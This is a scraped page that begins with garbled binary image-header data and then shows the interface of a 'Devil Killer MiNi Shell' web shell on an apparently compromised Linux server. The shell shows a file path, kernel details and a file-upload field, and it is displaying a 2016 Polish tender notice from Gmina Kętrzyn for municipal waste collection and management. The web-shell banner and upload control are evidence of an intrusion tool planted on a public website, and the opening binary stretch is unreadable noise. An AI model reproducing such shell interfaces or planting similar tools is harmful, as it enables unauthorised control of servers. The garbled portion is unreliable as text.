JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160701/115783-N-2016.html

<p class="kh_header"><b>Kętrzyn: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW  KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH NA TERENIE GMINY KĘTRZYN.</b><br>
<b>Numer ogłoszenia: 115783 - 2016; data zamieszczenia: 01.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kętrzyn , ul. Kościuszki 2, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7512474 w. 17, faks 089 7512746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.gminaketrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE ODPADÓW  KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH NA TERENIE GMINY KĘTRZYN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest odbieranie i zagospodarowanie odpadów komunalnych
 z nieruchomości zamieszkałych, położonych na terenie gminy Kętrzyn, zgodnie z wymogami przepisów prawa, w szczególności  w sposób zapewniający :
- osiągnięcie wymaganych poziomów recyklingu oraz przygotowania do ponownego użycia   i odzysku innymi metodami;
- ograniczenie masy odpadów komunalnych ulegających biodegradacji, przekazywanych do składowania. 
 
2. Wykonawca ponosi całkowitą odpowiedzialność za  gospodarowanie odebranymi odpadami zgodnie z  obowiązującymi w tym zakresie przepisami prawa, w szczególności w zakresie przeładunku odpadów, ich transportu, dostarczania uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.

3. Wykonawca zobowiązany będzie w szczególności do :

  1) odbioru wszystkich zmieszanych i zbieranych selektywnie odpadów komunalnych z nieruchomości zamieszkałych na terenie Gminy Kętrzyn, łącznie z zabudową kolonijną, zgodnie z wymaganą częstotliwością i zgodnie z harmonogramem;

  2) nie dopuszczaniu do wysypywania odpadów podczas załadunku i transportu oraz ważenia wszystkich odebranych odpadów komunalnych ;

  3) utrzymania właściwego stanu sanitarnego i technicznego pojazdów, urządzeń 
i pojemników; pojazdy muszą być zabezpieczone przed wydostawaniem się na zewnątrz odpadów podczas ich załadunku, transportu, przeładunku; pojazdy, urządzenia i pojemniki muszą być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego;

  4) przekazywania Zamawiającemu za każdy okres rozliczeniowy (miesiąc)  pisemnej informacji określającej łączną masę zebranych odpadów zmieszanych, łącznie z pozostałościami z segregacji,  oraz masę i rodzaj odpadów zebranych selektywnie;

  5) prowadzenia ewidencji odpadów, sprawozdawczości, w tym przekazywania Zamawiającemu sprawozdań podmiotu odbierającego odpady komunalne od właścicieli nieruchomości, zgodnie z wymogami przepisów prawa;
podstawą do sporządzenia sprawozdań jest prowadzona przez wykonawcę ewidencja 
odpadów i karty przekazania odpadów;

   6)  monitorowania obowiązku ciążącego na właścicielu nieruchomości w zakresie selektywnego zbierania odpadów komunalnych; w przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku w zakresie segregacji odpadów, Wykonawca odbiera odpady jako zmieszane oraz sporządza na tą okoliczność informację (np. oświadczenie, dokumentację fotograficzną) w celu wydania przez Zamawiającego decyzji administracyjnej o zmianie wysokości opłaty; 

   7)  przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych, przeznaczonych do składowania, do  instalacji przetwarzania odpadów komunalnych właściwej dla regionu, zgodnie z  aktualnym Planem Gospodarki Odpadami dla Województwa Warmińsko-Mazurskiego;

   8) zagospodarowania selektywnie zebranych odpadów komunalnych w instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami oraz zasadą bliskości, o których mowa w art. 17 oraz 20 ustawy z dnia 14 grudnia 2012 r.o odpadach (Dz.U.2013.21 z późn.zm.) ;

   9) osiągnięcia poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami,  określonych przepisami prawa;

  10) osiągnięcia, określonych przepisami prawa, poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania,;


4. Odbiór odpadów.
 4.1 Obowiązywać będzie system mieszany odbioru odpadów komunalnych, tj. workowo - pojemnikowy, zgodnie z zapisami SIWZ. Estetyczne i w dobrym stanie worki i pojemniki dostarczy właścicielom nieruchomości Wykonawca zamówienia, gwarantując im stały dostęp do pojemników i worków. Worki i pojemniki powinny być oznakowane w sposób jednoznacznie wskazujący przeznaczenie na odpady określonego rodzaju. Pojemniki stanowią własność Wykonawcy, worki zostaną przekazane nieodpłatnie wytwórcom odpadów. Wytrzymałość worków musi być odpowiednia dla niedopuszczenia do pękania worków podczas ich przenoszenia  w stanie całkowitego napełnienia. Wykonawca jest zobowiązany również do odbioru odpadów zgromadzonych poza pojemnikiem. 
     Wykonawca będzie odbierał odpady tego samego dnia  tygodnia z danej nieruchomości lub zbiorczego punktu odbioru odpadów, chyba, że dzień odbioru będzie przypadał na dzień wolny od pracy, wówczas następnego dnia. Wykonawca nie może odbierać odpadów w dni ustawowo wolne od pracy.

  4.2 Miejsce odbioru odpadów przez Wykonawcę:
    a) zabudowa jednorodzinna i zagrodowa, poza zbiorczymi punktami odbioru
        odpadów (gniazdami) - nieruchomość wytwórcy odpadu; Wykonawca wyposaży
        każdą nieruchomość  w : 
        - pojemniki na odpady zmieszane w przypadku braku selektywnej zbiórki;
        - worki do zbiórki selektywnej i pojemniki na pozostałości ze zbiórki selektywnej 
           w  przypadku zbiórki selektywnej;
   b) zabudowa wielorodzinna oraz jednorodzinna i zagrodowa, w obrębie zbiorczych
       punktów  odbioru odpadów  -   zbiorcze punkty odbioru odpadów (gniazda),
       wyposażone przez Wykonawcę w pojemniki na odpady zmieszane/pozostałości z
       segregacji  i zbierane selektywnie,
  
Z zastrzeżeniem pkt 4.6, 5.3 i 6  liczbę osób objętych odbiorem odpadów oraz liczbę  zbiorczych punktów odbioru odpadów określa załącznik Nr 1 do SIWZ.


   4.3 Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki wytwórcom odpadów dostarczy Wykonawca zamówienia. Wielkość pojemników : od 110 litrów do 1100 litrów oraz od 7 m3 do 16 m3. Wielkość i ilość pojemników musi być dostosowana do ilości odpadów powstających na nieruchomości.

Częstotliwość załadunku i odbioru odpadów :
- zabudowa jednorodzinna i zagrodowa    - jeden raz na 2 tygodnie,
- zabudowa wielorodzinna                         - jeden raz na tydzień .

 4.4 Selektywna zbiórka odpadów komunalnych będzie się odbywać w systemie workowym w zabudowie jednorodzinnej i zagrodowej, poza zbiorczymi punktami odbioru odpadów, oraz pojemnikowym w zbiorczych punktach odbioru odpadów.
Wykonawca nie może mieszać ze sobą odpadów zebranych selektywnie oraz mieszać ich         z innymi odpadami. 
Worki i pojemniki dostarczy wytwórcom odpadów Wykonawca  zamówienia. 
Wielkość pojemników : od 110 litrów do 1100 litrów oraz od 1,5 m3 do 3,2 m3.
Wielkość worków : co najmniej 60 litrów.

Wielkość i ilość pojemników i worków musi być dostosowana do ilości odpadów powstających na nieruchomości.

Częstotliwość załadunku i odbioru odpadów :
- szkło  :  jeden raz  w miesiącu ( ze zbiorczych punktów odbioru odpadów,),
- odpady zielone i biodegradowalne : jeden raz na 2 tygodnie w okresie od 1 października, jeden raz na tydzień w pozostałym okresie;   
- pozostałe odpady zbierane selektywnie - jeden raz na 2 tygodnie,
- pozostałości ze zbiórki selektywnej  i odpady zmieszane-  jak odpady zmieszane (pkt 4.3).


    4.4.1 Rodzaje pojemników, w jakie wykonawca wyposaży zbiorcze punkty odbioru odpadów :
- żółty     - do gromadzenia odpadów z tworzyw sztucznych, opakowań  wielomateriałowych i metalu,
- niebieski - do gromadzenia odpadów z papieru i tektury, 
- brązowy - do gromadzenia odpadów zielonych i biodegradowalnych,
- zielony   -  do szkła kolorowe,
- biały      -   do szkła bezbarwnego ,
- pojemnik na pozostałości ze zbiórki selektywnej i odpady zmieszane.

     4.4.2 Rodzaje worków, jakie Wykonawca dostarczy właścicielom nieruchomości :
- żółty     - do gromadzenia odpadów z tworzyw sztucznych, opakowań  wielomateriałowych
                   i metalu,
- niebieski - do gromadzenia odpadów z papieru i tektury, 
- brązowy - do gromadzenia odpadów zielonych i biodegradowalnych,

     4.4.3 Odbiór przeterminowanych leków i chemikaliów, zużytych baterii i akumulatorów, zużytego sprzętu elektrycznego i elektronicznego, mebli i innych odpadów wielkogabarytowych, zużytych opon, odpadów zielonych oraz odpadów budowlanych i rozbiórkowych stanowiących odpady komunalne  realizowany będzie przez Wykonawcę poprzez odbieranie 
tych odpadów od właścicieli nieruchomości i złożonych w zbiorczych punktach odbioru odpadów- zbiórka objazdowa w ustalonych z Zamawiającym terminach.
Częstotliwość załadunku i odbioru odpadów- zgodnie z ofertą Wykonawcy lecz nie rzadziej niż 1 raz w okresie realizacji   zamówienia.
  4.5 Na wniosek zamawiającego Wykonawca wyposaży, wskazane nieruchomości lub
zbiorcze punkty odbioru odpadów, w metalowe pojemniki na popiół. 
Wielkość pojemników : od 110 litrów do 1100 litrów. Wielkość pojemników dla konkretnych nieruchomości lub zbiorczych punktów odbioru odpadów wskaże zamawiający. Szacunkowa liczba pojemników na popiół  - 40 szt. Zamawiającemu przysługuje prawo zmiany liczby tych pojemników o 50 %.
Częstotliwość załadunku i odbioru odpadów - jak dla odpadów zmieszanych.

  4.6  Po podpisaniu umowy Zamawiający dostarczy Wykonawcy szczegółowy wykaz adresów nieruchomości objętych umową odbioru odpadów wraz z informacją o segregacji odpadów. Szczegółową lokalizację na terenie gminy zbiorczych punktów odbioru odpadów wykonawca uzgodni z zamawiającym .  Zamawiający zastrzega sobie prawo zmiany liczby tych punktów (gniazd)  w stosunku do ich liczby podanej w załączniku Nr 1 do SIWZ.  Zmiana liczby gniazd nie stanowi zmiany warunków umowy.
     Wykonawca zobowiązany jest niezwłocznie po podpisaniu umowy sporządzić i uzgodnić z zamawiającym harmonogram odbioru odpadów .

5.  Wielkość zamówienia.

   5.1 Szacunkowe dane określające wielkość przedmiotu zamówienia zawarte są w załączniku Nr 1 do  SIWZ.

  5.2 Łączna szacunkowa ilość odpadów objętych zamówieniem, dla liczby osób określonej
w załączniku Nr 1 do  SIWZ -  800 ton. Zmiana ilości odpadów nie stanowi
zmiany warunków zamówienia.
         
  5.3 Na wniosek zamawiającego Wykonawca będzie zobowiązany odbierać odpady również z  nieruchomości zamieszkałych, wskazanych przez zamawiającego, a nie ujętych w załączniku Nr 1 do  SIWZ.
Zamawiający zastrzega sobie prawo zmniejszenia liczby nieruchomości zamieszkałych,
z których odbierane będą odpady.
  
6. Za  realizację zamówienia Wykonawca otrzyma wynagrodzenie ryczałtowe, wypłacane przez zamawiającego po upływie każdego okresu rozliczeniowego, tj. miesiąca. Jeżeli  okres realizacji zamówienia nie będzie obejmował pełnego miesiąca kalendarzowego, wynagrodzenie Wykonawcy za ten miesiąc będzie proporcjonalne do długości okresu świadczenia usługi. Wysokość  wynagrodzenia Wykonawcy będzie zgodna z ofertą wykonawcy, z zastrzeżeniem dopuszczalnych zmian, określonych w SIWZ.         
     W przypadku zmiany liczby osób objętych odbiorem odpadów o więcej niż 1 % w stosunku do wykazanej w załączniku Nr 1 do SIWZ, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę równą iloczynowi miesięcznej stawki ryczałtowej brutto za odbiór odpadów wytworzonych przez 1 osobę (wg oferty) oraz liczby osób będącej różnicą pomiędzy liczbą osób objętych odbiorem odpadów, ustalaną na bieżąco przez zamawiającego, i liczbą osób wykazaną w załączniku Nr 1 do SIWZ. 
     Zwiększenie zakresu zamówienia, wynikające ze zwiększenia liczby osób objętych odbiorem odpadów, nie przekroczy 5 % ogólnej liczby osób, określonej w załączniku Nr 1 do  SIWZ.
    Zmiana wynagrodzenia Wykonawcy wchodzi w życie od pierwszego dnia miesiąca następującego po dniu przekazania Wykonawcy przez zamawiającego  informacji o zmianie liczby osób o wymagany próg (1%).
Zamawiający zapłaci wynagrodzenie Wykonawcy w terminie 14 dni od otrzymania prawidłowo wystawionej faktury.

7. Wspólny Słownik Zamówień (CPV): 

90.50.00.00-2 Usługi związane z odpadami 
90.51.10.00-2 Usługi wywozu odpadów 
90.51.20.00-9 Usługi transportu odpadów 
90.51.31.00-7 Usługi wywozu odpadów pochodzących z gospodarstw domowych 
90.51.40.00-3 Usługi recyklingu odpadów 
90.53.30.00-2 Usługi gospodarki odpadami 

8. Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67
ust.1 pkt 6 ustawy, o łącznej wielkości nie większej niż 10% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień. Wykonawcy nie przysługuje roszczenie o udzie-lenie zamówienia uzupełniającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67
ust.1 pkt 6 ustawy, o łącznej wielkości nie większej niż 10% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium 
w wysokości : 8 000,- zł (osiem tysięcy).

2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 
ust. 6 ustawy, tj.:
   1)	pieniądzu;
   2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
   3)	gwarancjach bankowych;
   4)	gwarancjach ubezpieczeniowych;
   	5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości         (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
Wadium wnoszone w pieniądzu należy wnieść przelewem  na rachunek bankowy Zamawiającego:
 Nr 71 2030 0045 1110 0000 0287 4780
 z podaniem tytułu: 
Wadium - odbiór i zagospodarowanie odpadów, Gmina Kętrzyn, RGG.272.402016.
4. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
5. Wadium wnoszone w formie innej niż pieniądz musi być nieodwołalne i gwarantować wypłatę kwoty wadium w przypadkach przewidzianych ustawą, a oryginał dokumentu stanowiącego wadium należy dołączyć do oferty.
6. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.
7. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana :
   1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach
       określonych  w ofercie;
   2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
   3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn 
       leżących po stronie wykonawcy;
   4) jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy,
       z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których
       mowa w art. 25  ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy
       kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie
       należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której
       mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty
       złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli Wykonawca wykaże, iż posiada : 
 wpis   do   rejestru   działalności   regulowanej   w   zakresie   odbierania   odpadów 
komunalnych od właścicieli nieruchomości z terenu  Gminy Kętrzyn.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli Wykonawca  wykaże,   że   realizuje   lub  zrealizo-
wał w okresie trzech ostatnich lat przed upływem terminu do składania ofert, a  jeżeli  
okres  prowadzenia  działalności  jest  krótszy  -  w  tym  okresie, co najmniej jedną usługę  odbioru  i zagospodarowaniu  odpadów komunalnych od właścicieli  nieruchomości, 
o wartości  co najmniej  300 000,- PLN (słownie : trzysta tysięcy);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli  wykonawca wykaże, że dysponuje (łącznie): 
   a) co najmniej 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów    
komunalnych;
   b) co najmniej 2 pojazdami przystosowanymi do odbierania selektywnie zebranych 
odpadów komunalnych;
   c) co najmniej 1 pojazdem do odbierania odpadów bez funkcji kompaktującej,               
   d)  bazą  magazynowo  -  transportową  usytuowaną    w  Gminie  Kętrzyn,  lub  w odle
głości  nie większej niż 60 km od granicy Gminy Kętrzyn, na terenie, do którego posiada 
 tytuł prawny;  
   e) pojemnikami niezbędnymi do realizacji zamówienia ;

     wymienione wyżej pojazdy oraz baza magazynowo - transportowa muszą spełniać warunki 
określone  w  Rozporządzeniu  Ministra  Środowiska  z  dnia  11  stycznia  2013r.  w spra
wie  szczegółowych  wymagań  w  zakresie  odbierania  odpadów  komunalnych  od 
właścicieli  nieruchomości  (Dz.  U.  z  2013r.  poz.  122);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań; ocena spełniania tego warunku 
odbywać się będzie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1  ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań; ocena spełniania tego warunku 
odbywać się będzie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1  ustawy Prawo zamówień publicznych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

